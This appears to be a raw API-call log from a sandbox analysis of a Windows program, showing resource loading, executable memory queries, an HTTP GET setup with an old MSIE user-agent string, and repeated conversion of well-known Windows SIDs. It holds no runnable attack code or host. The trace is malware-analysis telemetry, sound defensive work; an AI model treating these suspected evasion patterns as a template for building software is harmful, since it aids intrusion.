[0190.601] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x8efec, fWinIni=0x0 | out: pvParam=0x8efec) returned 1
[0190.601] IsWindowVisible (hWnd=0x1301e8) returned 0
[0190.601] GetCurrentThreadId () returned 0x810
[0190.601] VirtualQuery (in: lpAddress=0x2911668, lpBuffer=0x8eebc, dwLength=0x1c | out: lpBuffer=0x8eebc*(BaseAddress=0x2911000, AllocationBase=0x2850000, AllocationProtect=0x40, RegionSize=0x52000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c
[0190.602] FindResourceA (hModule=0x2850000, lpName="TmarxvxinhhmA", lpType=0xa) returned 0x2958990
[0190.602] FindResourceA (hModule=0x2850000, lpName="TmarxvxinhhmA", lpType=0xa) returned 0x2958990
[0190.602] LoadResource (hModule=0x2850000, hResInfo=0x2958990) returned 0x295f044
[0190.602] SizeofResource (hModule=0x2850000, hResInfo=0x2958990) returned 0xca5
[0190.602] LockResource (hResData=0x295f044) returned 0x295f044
[0190.602] GetCurrentThreadId () returned 0x810
[0190.602] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x8ec70, fWinIni=0x0 | out: pvParam=0x8ec70) returned 1
[0190.602] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x8ec70, fWinIni=0x0 | out: pvParam=0x8ec70) returned 1
[0190.602] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x8ec70, fWinIni=0x0 | out: pvParam=0x8ec70) returned 1
[0190.602] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x8ec70, fWinIni=0x0 | out: pvParam=0x8ec70) returned 1
[0190.603] GetDC (hWnd=0x0) returned 0x68010872
[0190.603] GetTextMetricsA (in: hdc=0x68010872, lptm=0x8ec54 | out: lptm=0x8ec54) returned 1
[0190.603] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="MS Sans Serif", cchCount1=13, lpString2="Default", cchCount2=7) returned 3
[0190.604] CreateFontIndirectA (lplf=0x8ec0c) returned 0x8a0a085e
[0190.604] SelectObject (hdc=0x68010872, h=0x8a0a085e) returned 0x18a002e
[0190.604] GetTextMetricsA (in: hdc=0x68010872, lptm=0x8ec8c | out: lptm=0x8ec8c) returned 1
[0190.604] SelectObject (hdc=0x68010872, h=0x18a002e) returned 0x8a0a085e
[0190.604] ReleaseDC (hWnd=0x0, hDC=0x68010872) returned 1
[0190.604] GetSystemMetrics (nIndex=6) returned 1
[0190.605] VirtualAlloc (lpAddress=0x2974000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2974000
[0190.605] GetDC (hWnd=0x0) returned 0x68010872
[0190.605] GetTextMetricsA (in: hdc=0x68010872, lptm=0x8ec54 | out: lptm=0x8ec54) returned 1
[0190.605] SelectObject (hdc=0x68010872, h=0x8a0a085e) returned 0x18a002e
[0190.605] GetTextMetricsA (in: hdc=0x68010872, lptm=0x8ec8c | out: lptm=0x8ec8c) returned 1
[0190.605] SelectObject (hdc=0x68010872, h=0x18a002e) returned 0x8a0a085e
[0190.605] ReleaseDC (hWnd=0x0, hDC=0x68010872) returned 1
[0190.605] GetSystemMetrics (nIndex=6) returned 1
[0190.605] GetDC (hWnd=0x0) returned 0x68010872
[0190.606] GetTextMetricsA (in: hdc=0x68010872, lptm=0x8ec54 | out: lptm=0x8ec54) returned 1
[0190.606] SelectObject (hdc=0x68010872, h=0x8a0a085e) returned 0x18a002e
[0190.606] GetTextMetricsA (in: hdc=0x68010872, lptm=0x8ec8c | out: lptm=0x8ec8c) returned 1
[0190.606] SelectObject (hdc=0x68010872, h=0x18a002e) returned 0x8a0a085e
[0190.606] ReleaseDC (hWnd=0x0, hDC=0x68010872) returned 1
[0190.606] GetSystemMetrics (nIndex=6) returned 1
[0190.606] GetDC (hWnd=0x0) returned 0x68010872
[0190.606] GetTextMetricsA (in: hdc=0x68010872, lptm=0x8ec54 | out: lptm=0x8ec54) returned 1
[0190.606] SelectObject (hdc=0x68010872, h=0x8a0a085e) returned 0x18a002e
[0190.606] GetTextMetricsA (in: hdc=0x68010872, lptm=0x8ec8c | out: lptm=0x8ec8c) returned 1
[0190.606] SelectObject (hdc=0x68010872, h=0x18a002e) returned 0x8a0a085e
[0190.606] ReleaseDC (hWnd=0x0, hDC=0x68010872) returned 1
[0190.606] GetSystemMetrics (nIndex=6) returned 1
[0190.606] GetDC (hWnd=0x0) returned 0x68010872
[0190.606] GetTextMetricsA (in: hdc=0x68010872, lptm=0x8ec68 | out: lptm=0x8ec68) returned 1
[0190.606] SelectObject (hdc=0x68010872, h=0x8a0a085e) returned 0x18a002e
[0190.606] GetTextMetricsA (in: hdc=0x68010872, lptm=0x8eca0 | out: lptm=0x8eca0) returned 1
[0190.607] SelectObject (hdc=0x68010872, h=0x18a002e) returned 0x8a0a085e
[0190.607] ReleaseDC (hWnd=0x0, hDC=0x68010872) returned 1
[0190.607] GetSystemMetrics (nIndex=6) returned 1
[0190.607] GetDC (hWnd=0x0) returned 0x68010872
[0190.607] GetTextMetricsA (in: hdc=0x68010872, lptm=0x8e96c | out: lptm=0x8e96c) returned 1
[0190.607] SelectObject (hdc=0x68010872, h=0x8a0a085e) returned 0x18a002e
[0190.607] GetTextMetricsA (in: hdc=0x68010872, lptm=0x8e9a4 | out: lptm=0x8e9a4) returned 1
[0190.607] SelectObject (hdc=0x68010872, h=0x18a002e) returned 0x8a0a085e
[0190.607] ReleaseDC (hWnd=0x0, hDC=0x68010872) returned 1
[0190.607] GetSystemMetrics (nIndex=6) returned 1
[0190.607] GetDC (hWnd=0x0) returned 0x68010872
[0190.607] GetTextMetricsA (in: hdc=0x68010872, lptm=0x8ec68 | out: lptm=0x8ec68) returned 1
[0190.607] SelectObject (hdc=0x68010872, h=0x8a0a085e) returned 0x18a002e
[0190.607] GetTextMetricsA (in: hdc=0x68010872, lptm=0x8eca0 | out: lptm=0x8eca0) returned 1
[0190.607] SelectObject (hdc=0x68010872, h=0x18a002e) returned 0x8a0a085e
[0190.607] ReleaseDC (hWnd=0x0, hDC=0x68010872) returned 1
[0190.607] GetSystemMetrics (nIndex=6) returned 1
[0190.607] GetDC (hWnd=0x0) returned 0x68010872
[0190.607] GetTextMetricsA (in: hdc=0x68010872, lptm=0x8e96c | out: lptm=0x8e96c) returned 1
[0190.607] SelectObject (hdc=0x68010872, h=0x8a0a085e) returned 0x18a002e
[0190.607] GetTextMetricsA (in: hdc=0x68010872, lptm=0x8e9a4 | out: lptm=0x8e9a4) returned 1
[0190.607] SelectObject (hdc=0x68010872, h=0x18a002e) returned 0x8a0a085e
[0190.607] ReleaseDC (hWnd=0x0, hDC=0x68010872) returned 1
[0190.607] GetSystemMetrics (nIndex=6) returned 1
[0190.608] GetDC (hWnd=0x0) returned 0x68010872
[0190.608] GetTextMetricsA (in: hdc=0x68010872, lptm=0x8ec68 | out: lptm=0x8ec68) returned 1
[0190.608] SelectObject (hdc=0x68010872, h=0x8a0a085e) returned 0x18a002e
[0190.608] GetTextMetricsA (in: hdc=0x68010872, lptm=0x8eca0 | out: lptm=0x8eca0) returned 1
[0190.608] SelectObject (hdc=0x68010872, h=0x18a002e) returned 0x8a0a085e
[0190.608] ReleaseDC (hWnd=0x0, hDC=0x68010872) returned 1
[0190.608] GetSystemMetrics (nIndex=6) returned 1
[0190.608] GetDC (hWnd=0x0) returned 0x68010872
[0190.608] GetTextMetricsA (in: hdc=0x68010872, lptm=0x8e96c | out: lptm=0x8e96c) returned 1
[0190.608] SelectObject (hdc=0x68010872, h=0x8a0a085e) returned 0x18a002e
[0190.608] GetTextMetricsA (in: hdc=0x68010872, lptm=0x8e9a4 | out: lptm=0x8e9a4) returned 1
[0190.608] SelectObject (hdc=0x68010872, h=0x18a002e) returned 0x8a0a085e
[0190.608] ReleaseDC (hWnd=0x0, hDC=0x68010872) returned 1
[0190.608] GetSystemMetrics (nIndex=6) returned 1
[0190.608] GetDC (hWnd=0x0) returned 0x68010872
[0190.608] GetTextMetricsA (in: hdc=0x68010872, lptm=0x8ec54 | out: lptm=0x8ec54) returned 1
[0190.608] SelectObject (hdc=0x68010872, h=0x8a0a085e) returned 0x18a002e
[0190.608] GetTextMetricsA (in: hdc=0x68010872, lptm=0x8ec8c | out: lptm=0x8ec8c) returned 1
[0190.608] SelectObject (hdc=0x68010872, h=0x18a002e) returned 0x8a0a085e
[0190.608] ReleaseDC (hWnd=0x0, hDC=0x68010872) returned 1
[0190.609] GetSystemMetrics (nIndex=6) returned 1
[0190.609] GetDC (hWnd=0x0) returned 0x68010872
[0190.609] GetTextMetricsA (in: hdc=0x68010872, lptm=0x8ec54 | out: lptm=0x8ec54) returned 1
[0190.609] SelectObject (hdc=0x68010872, h=0x8a0a085e) returned 0x18a002e
[0190.609] GetTextMetricsA (in: hdc=0x68010872, lptm=0x8ec8c | out: lptm=0x8ec8c) returned 1
[0190.609] SelectObject (hdc=0x68010872, h=0x18a002e) returned 0x8a0a085e
[0190.609] ReleaseDC (hWnd=0x0, hDC=0x68010872) returned 1
[0190.609] GetSystemMetrics (nIndex=6) returned 1
[0190.609] GetDC (hWnd=0x0) returned 0x68010872
[0190.609] GetTextMetricsA (in: hdc=0x68010872, lptm=0x8ec68 | out: lptm=0x8ec68) returned 1
[0190.609] SelectObject (hdc=0x68010872, h=0x8a0a085e) returned 0x18a002e
[0190.609] GetTextMetricsA (in: hdc=0x68010872, lptm=0x8eca0 | out: lptm=0x8eca0) returned 1
[0190.609] SelectObject (hdc=0x68010872, h=0x18a002e) returned 0x8a0a085e
[0190.609] ReleaseDC (hWnd=0x0, hDC=0x68010872) returned 1
[0190.609] GetSystemMetrics (nIndex=6) returned 1
[0190.610] GetDC (hWnd=0x0) returned 0x68010872
[0190.610] GetTextMetricsA (in: hdc=0x68010872, lptm=0x8e96c | out: lptm=0x8e96c) returned 1
[0190.610] SelectObject (hdc=0x68010872, h=0x8a0a085e) returned 0x18a002e
[0190.610] GetTextMetricsA (in: hdc=0x68010872, lptm=0x8e9a4 | out: lptm=0x8e9a4) returned 1
[0190.610] SelectObject (hdc=0x68010872, h=0x18a002e) returned 0x8a0a085e
[0190.610] ReleaseDC (hWnd=0x0, hDC=0x68010872) returned 1
[0190.610] GetSystemMetrics (nIndex=6) returned 1
[0190.610] GetDC (hWnd=0x0) returned 0x68010872
[0190.610] GetTextMetricsA (in: hdc=0x68010872, lptm=0x8ec68 | out: lptm=0x8ec68) returned 1
[0190.610] SelectObject (hdc=0x68010872, h=0x8a0a085e) returned 0x18a002e
[0190.610] GetTextMetricsA (in: hdc=0x68010872, lptm=0x8eca0 | out: lptm=0x8eca0) returned 1
[0190.610] SelectObject (hdc=0x68010872, h=0x18a002e) returned 0x8a0a085e
[0190.610] ReleaseDC (hWnd=0x0, hDC=0x68010872) returned 1
[0190.610] GetSystemMetrics (nIndex=6) returned 1
[0190.610] GetDC (hWnd=0x0) returned 0x68010872
[0190.610] GetTextMetricsA (in: hdc=0x68010872, lptm=0x8e96c | out: lptm=0x8e96c) returned 1
[0190.610] SelectObject (hdc=0x68010872, h=0x8a0a085e) returned 0x18a002e
[0190.610] GetTextMetricsA (in: hdc=0x68010872, lptm=0x8e9a4 | out: lptm=0x8e9a4) returned 1
[0190.610] SelectObject (hdc=0x68010872, h=0x18a002e) returned 0x8a0a085e
[0190.610] ReleaseDC (hWnd=0x0, hDC=0x68010872) returned 1
[0190.611] GetSystemMetrics (nIndex=6) returned 1
[0190.611] GetDC (hWnd=0x0) returned 0x68010872
[0190.611] GetTextMetricsA (in: hdc=0x68010872, lptm=0x8ec68 | out: lptm=0x8ec68) returned 1
[0190.611] SelectObject (hdc=0x68010872, h=0x8a0a085e) returned 0x18a002e
[0190.611] GetTextMetricsA (in: hdc=0x68010872, lptm=0x8eca0 | out: lptm=0x8eca0) returned 1
[0190.611] SelectObject (hdc=0x68010872, h=0x18a002e) returned 0x8a0a085e
[0190.611] ReleaseDC (hWnd=0x0, hDC=0x68010872) returned 1
[0190.611] GetSystemMetrics (nIndex=6) returned 1
[0190.611] GetDC (hWnd=0x0) returned 0x68010872
[0190.611] GetTextMetricsA (in: hdc=0x68010872, lptm=0x8e96c | out: lptm=0x8e96c) returned 1
[0190.611] SelectObject (hdc=0x68010872, h=0x8a0a085e) returned 0x18a002e
[0190.611] GetTextMetricsA (in: hdc=0x68010872, lptm=0x8e9a4 | out: lptm=0x8e9a4) returned 1
[0190.611] SelectObject (hdc=0x68010872, h=0x18a002e) returned 0x8a0a085e
[0190.611] ReleaseDC (hWnd=0x0, hDC=0x68010872) returned 1
[0190.611] GetSystemMetrics (nIndex=6) returned 1
[0190.611] GetDC (hWnd=0x0) returned 0x68010872
[0190.611] GetTextMetricsA (in: hdc=0x68010872, lptm=0x8ec68 | out: lptm=0x8ec68) returned 1
[0190.612] SelectObject (hdc=0x68010872, h=0x8a0a085e) returned 0x18a002e
[0190.612] GetTextMetricsA (in: hdc=0x68010872, lptm=0x8eca0 | out: lptm=0x8eca0) returned 1
[0190.612] SelectObject (hdc=0x68010872, h=0x18a002e) returned 0x8a0a085e
[0190.612] ReleaseDC (hWnd=0x0, hDC=0x68010872) returned 1
[0190.612] GetSystemMetrics (nIndex=6) returned 1
[0190.612] GetDC (hWnd=0x0) returned 0x68010872
[0190.612] GetTextMetricsA (in: hdc=0x68010872, lptm=0x8e96c | out: lptm=0x8e96c) returned 1
[0190.612] SelectObject (hdc=0x68010872, h=0x8a0a085e) returned 0x18a002e
[0190.612] GetTextMetricsA (in: hdc=0x68010872, lptm=0x8e9a4 | out: lptm=0x8e9a4) returned 1
[0190.612] SelectObject (hdc=0x68010872, h=0x18a002e) returned 0x8a0a085e
[0190.612] ReleaseDC (hWnd=0x0, hDC=0x68010872) returned 1
[0190.612] GetSystemMetrics (nIndex=6) returned 1
[0190.612] GetDC (hWnd=0x0) returned 0x68010872
[0190.612] GetTextMetricsA (in: hdc=0x68010872, lptm=0x8ec54 | out: lptm=0x8ec54) returned 1
[0190.612] SelectObject (hdc=0x68010872, h=0x8a0a085e) returned 0x18a002e
[0190.612] GetTextMetricsA (in: hdc=0x68010872, lptm=0x8ec8c | out: lptm=0x8ec8c) returned 1
[0190.612] SelectObject (hdc=0x68010872, h=0x18a002e) returned 0x8a0a085e
[0190.612] ReleaseDC (hWnd=0x0, hDC=0x68010872) returned 1
[0190.612] GetSystemMetrics (nIndex=6) returned 1
[0190.614] SysReAllocStringLen (in: pbstr=0x297f388*=0x0, psz="GET", len=0x3 | out: pbstr=0x297f388*="GET") returned 1
[0190.614] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0190.614] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0190.614] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0190.614] SysReAllocStringLen (in: pbstr=0x297f388*="GET", psz="GET", len=0x3 | out: pbstr=0x297f388*="GET") returned 1
[0190.614] SysReAllocStringLen (in: pbstr=0x297f3b8*=0x0, psz="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)", len=0x39 | out: pbstr=0x297f3b8*="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)") returned 1
[0190.614] InternetQueryOptionW (in: hInternet=0x0, dwOption=0x6, lpBuffer=0x8ecf0, lpdwBufferLength=0x8ecf4 | out: lpBuffer=0x8ecf0, lpdwBufferLength=0x8ecf4) returned 1
[0190.654] InternetSetOptionW (hInternet=0x0, dwOption=0x6, lpBuffer=0x8ecf0, dwBufferLength=0x4) returned 1
[0190.654] VirtualFree (lpAddress=0x2980000, dwSize=0x4000, dwFreeType=0x4000) returned 1
[0190.655] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x2976490, cbMultiByte=3, lpWideCharStr=0x8dc28, cchWideChar=2047 | out: lpWideCharStr="GET") returned 3
[0190.655] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0190.655] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0190.655] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0190.655] SysReAllocStringLen (in: pbstr=0x297f388*="GET", psz="GET", len=0x3 | out: pbstr=0x297f388*="GET") returned 1
[0190.655] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0190.655] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0190.655] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0190.655] SysReAllocStringLen (in: pbstr=0x297f388*="GET", psz="GET", len=0x3 | out: pbstr=0x297f388*="GET") returned 1
[0190.660] GetTextExtentPoint32A (in: hdc=0x68010872, lpString="0", c=1, psizl=0x8ede4 | out: psizl=0x8ede4) returned 1
[0190.661] IsIconic (hWnd=0x1401a8) returned 0
[0190.661] GetClientRect (in: hWnd=0x1401a8, lpRect=0x8ede4 | out: lpRect=0x8ede4) returned 1
[0190.661] GetWindowLongA (hWnd=0x1401a8, nIndex=-16) returned 116326400
[0190.661] GetWindowLongA (hWnd=0x1401a8, nIndex=-16) returned 116326400
[0190.661] IsIconic (hWnd=0x1401a8) returned 0
[0190.661] GetClientRect (in: hWnd=0x1401a8, lpRect=0x8ed2c | out: lpRect=0x8ed2c) returned 1
[0190.661] GetWindowLongA (hWnd=0x1401a8, nIndex=-16) returned 116326400
[0190.661] GetWindowLongA (hWnd=0x1401a8, nIndex=-16) returned 116326400
[0190.661] IsIconic (hWnd=0x1401a8) returned 0
[0190.661] GetClientRect (in: hWnd=0x1401a8, lpRect=0x8ecfc | out: lpRect=0x8ecfc) returned 1
[0190.661] GetWindowLongA (hWnd=0x1401a8, nIndex=-16) returned 116326400
[0190.661] GetWindowLongA (hWnd=0x1401a8, nIndex=-16) returned 116326400
[0190.661] IsIconic (hWnd=0x1401a8) returned 0
[0190.661] GetClientRect (in: hWnd=0x1401a8, lpRect=0x8ecfc | out: lpRect=0x8ecfc) returned 1
[0190.661] FlatSB_SetScrollProp (param_1=0x1401a8, index=0x200, newValue=0x0, param_4=0) returned 0
[0190.661] GetSysColor (nIndex=20) returned 0xffffff
[0190.661] FlatSB_SetScrollProp (param_1=0x1401a8, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0190.661] FlatSB_SetScrollInfo (param_1=0x1401a8, code=0, psi=0x8ed3a, fRedraw=1) returned 0
[0190.661] GetWindowLongA (hWnd=0x1401a8, nIndex=-16) returned 116326400
[0190.661] IsIconic (hWnd=0x1401a8) returned 0
[0190.661] GetClientRect (in: hWnd=0x1401a8, lpRect=0x8ecfc | out: lpRect=0x8ecfc) returned 1
[0190.661] GetWindowLongA (hWnd=0x1401a8, nIndex=-16) returned 116326400
[0190.661] IsIconic (hWnd=0x1401a8) returned 0
[0190.661] GetClientRect (in: hWnd=0x1401a8, lpRect=0x8ecfc | out: lpRect=0x8ecfc) returned 1
[0190.661] GetWindowLongA (hWnd=0x1401a8, nIndex=-16) returned 116326400
[0190.662] IsIconic (hWnd=0x1401a8) returned 0
[0190.662] GetClientRect (in: hWnd=0x1401a8, lpRect=0x8ecfc | out: lpRect=0x8ecfc) returned 1
[0190.662] FlatSB_SetScrollProp (param_1=0x1401a8, index=0x100, newValue=0x0, param_4=0) returned 0
[0190.662] GetSysColor (nIndex=20) returned 0xffffff
[0190.662] FlatSB_SetScrollProp (param_1=0x1401a8, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0190.662] FlatSB_SetScrollInfo (param_1=0x1401a8, code=1, psi=0x8ed3a, fRedraw=1) returned 0
[0190.662] GetWindowLongA (hWnd=0x1401a8, nIndex=-16) returned 116326400
[0190.662] IsIconic (hWnd=0x1401a8) returned 0
[0190.662] GetClientRect (in: hWnd=0x1401a8, lpRect=0x8ecfc | out: lpRect=0x8ecfc) returned 1
[0190.662] GetWindowLongA (hWnd=0x1401a8, nIndex=-16) returned 116326400
[0190.662] GetWindowLongA (hWnd=0x1401a8, nIndex=-16) returned 116326400
[0190.662] IsIconic (hWnd=0x1401a8) returned 0
[0190.662] GetClientRect (in: hWnd=0x1401a8, lpRect=0x8ed2c | out: lpRect=0x8ed2c) returned 1
[0190.662] GetWindowLongA (hWnd=0x1401a8, nIndex=-16) returned 116326400
[0190.662] GetWindowLongA (hWnd=0x1401a8, nIndex=-16) returned 116326400
[0190.662] IsIconic (hWnd=0x1401a8) returned 0
[0190.662] GetClientRect (in: hWnd=0x1401a8, lpRect=0x8ecfc | out: lpRect=0x8ecfc) returned 1
[0190.662] GetWindowLongA (hWnd=0x1401a8, nIndex=-16) returned 116326400
[0190.662] GetWindowLongA (hWnd=0x1401a8, nIndex=-16) returned 116326400
[0190.662] IsIconic (hWnd=0x1401a8) returned 0
[0190.662] GetClientRect (in: hWnd=0x1401a8, lpRect=0x8ecfc | out: lpRect=0x8ecfc) returned 1
[0190.662] FlatSB_SetScrollProp (param_1=0x1401a8, index=0x200, newValue=0x0, param_4=0) returned 0
[0190.662] GetSysColor (nIndex=20) returned 0xffffff
[0190.662] FlatSB_SetScrollProp (param_1=0x1401a8, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0190.662] FlatSB_SetScrollInfo (param_1=0x1401a8, code=0, psi=0x8ed3a, fRedraw=1) returned 0
[0190.662] GetWindowLongA (hWnd=0x1401a8, nIndex=-16) returned 116326400
[0190.662] IsIconic (hWnd=0x1401a8) returned 0
[0190.663] GetClientRect (in: hWnd=0x1401a8, lpRect=0x8ecfc | out: lpRect=0x8ecfc) returned 1
[0190.663] GetWindowLongA (hWnd=0x1401a8, nIndex=-16) returned 116326400
[0190.663] IsIconic (hWnd=0x1401a8) returned 0
[0190.663] GetClientRect (in: hWnd=0x1401a8, lpRect=0x8ecfc | out: lpRect=0x8ecfc) returned 1
[0190.663] GetWindowLongA (hWnd=0x1401a8, nIndex=-16) returned 116326400
[0190.663] IsIconic (hWnd=0x1401a8) returned 0
[0190.663] GetClientRect (in: hWnd=0x1401a8, lpRect=0x8ecfc | out: lpRect=0x8ecfc) returned 1
[0190.663] FlatSB_SetScrollProp (param_1=0x1401a8, index=0x100, newValue=0x0, param_4=0) returned 0
[0190.663] GetSysColor (nIndex=20) returned 0xffffff
[0190.663] FlatSB_SetScrollProp (param_1=0x1401a8, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0190.663] FlatSB_SetScrollInfo (param_1=0x1401a8, code=1, psi=0x8ed3a, fRedraw=1) returned 0
[0190.663] GetWindowLongA (hWnd=0x1401a8, nIndex=-16) returned 116326400
[0190.663] IsIconic (hWnd=0x1401a8) returned 0
[0190.663] GetClientRect (in: hWnd=0x1401a8, lpRect=0x8ecfc | out: lpRect=0x8ecfc) returned 1
[0190.663] GetCurrentThreadId () returned 0x810
[0190.663] ConvertSidToStringSidA () returned 0x1
[0190.663] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0190.663] GetProcAddress (hModule=0x75370000, lpProcName="LocalFree") returned 0x753bca64
[0190.663] LocalFree (hMem=0x176f40) returned 0x0
[0190.663] LocalFree (hMem=0x162f90) returned 0x0
[0190.664] ConvertStringSidToSidA () returned 0x1
[0190.664] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2972914, pSourceSid=0x162f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2972914*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0190.664] IsValidSid (pSid=0x2972914*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0190.664] ConvertSidToStringSidA () returned 0x1
[0190.664] LocalFree (hMem=0x176f40) returned 0x0
[0190.664] LocalFree (hMem=0x162f90) returned 0x0
[0190.664] ConvertStringSidToSidA () returned 0x1
[0190.664] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x297702c, pSourceSid=0x162f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x297702c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0190.664] IsValidSid (pSid=0x297702c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0190.664] ConvertSidToStringSidA () returned 0x1
[0190.664] LocalFree (hMem=0x176f40) returned 0x0
[0190.664] LocalFree (hMem=0x162f90) returned 0x0
[0190.664] ConvertStringSidToSidA () returned 0x1
[0190.664] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x297f5a0, pSourceSid=0x162f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x297f5a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0190.664] IsValidSid (pSid=0x297f5a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0190.664] ConvertSidToStringSidA () returned 0x1
[0190.664] LocalFree (hMem=0x176f40) returned 0x0
[0190.664] LocalFree (hMem=0x162f90) returned 0x0
[0190.664] ConvertStringSidToSidA () returned 0x1
[0190.664] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x297f614, pSourceSid=0x176f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x297f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0190.664] IsValidSid (pSid=0x297f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0190.664] ConvertSidToStringSidA () returned 0x1
[0190.664] LocalFree (hMem=0x176f58) returned 0x0
[0190.664] LocalFree (hMem=0x176f40) returned 0x0
[0190.664] ConvertStringSidToSidA () returned 0x1
[0190.664] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x297f688, pSourceSid=0x176f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe) | out: pDestinationSid=0x297f688*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe)) returned 1
[0190.664] IsValidSid (pSid=0x297f688*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe)) returned 1
[0190.664] ConvertSidToStringSidA () returned 0x1
[0190.664] LocalFree (hMem=0x176f58) returned 0x0
[0190.664] LocalFree (hMem=0x176f40) returned 0x0
[0190.664] ConvertStringSidToSidA () returned 0x1
[0190.664] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x297f6fc, pSourceSid=0x176f58*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0) | out: pDestinationSid=0x297f6fc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0)) returned 1
[0190.664] IsValidSid (pSid=0x297f6fc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0)) returned 1
[0190.664] ConvertSidToStringSidA () returned 0x1
[0190.664] LocalFree (hMem=0x16c1c8) returned 0x0
[0190.664] LocalFree (hMem=0x176f58) returned 0x0
[0190.665] ConvertStringSidToSidA () returned 0x1
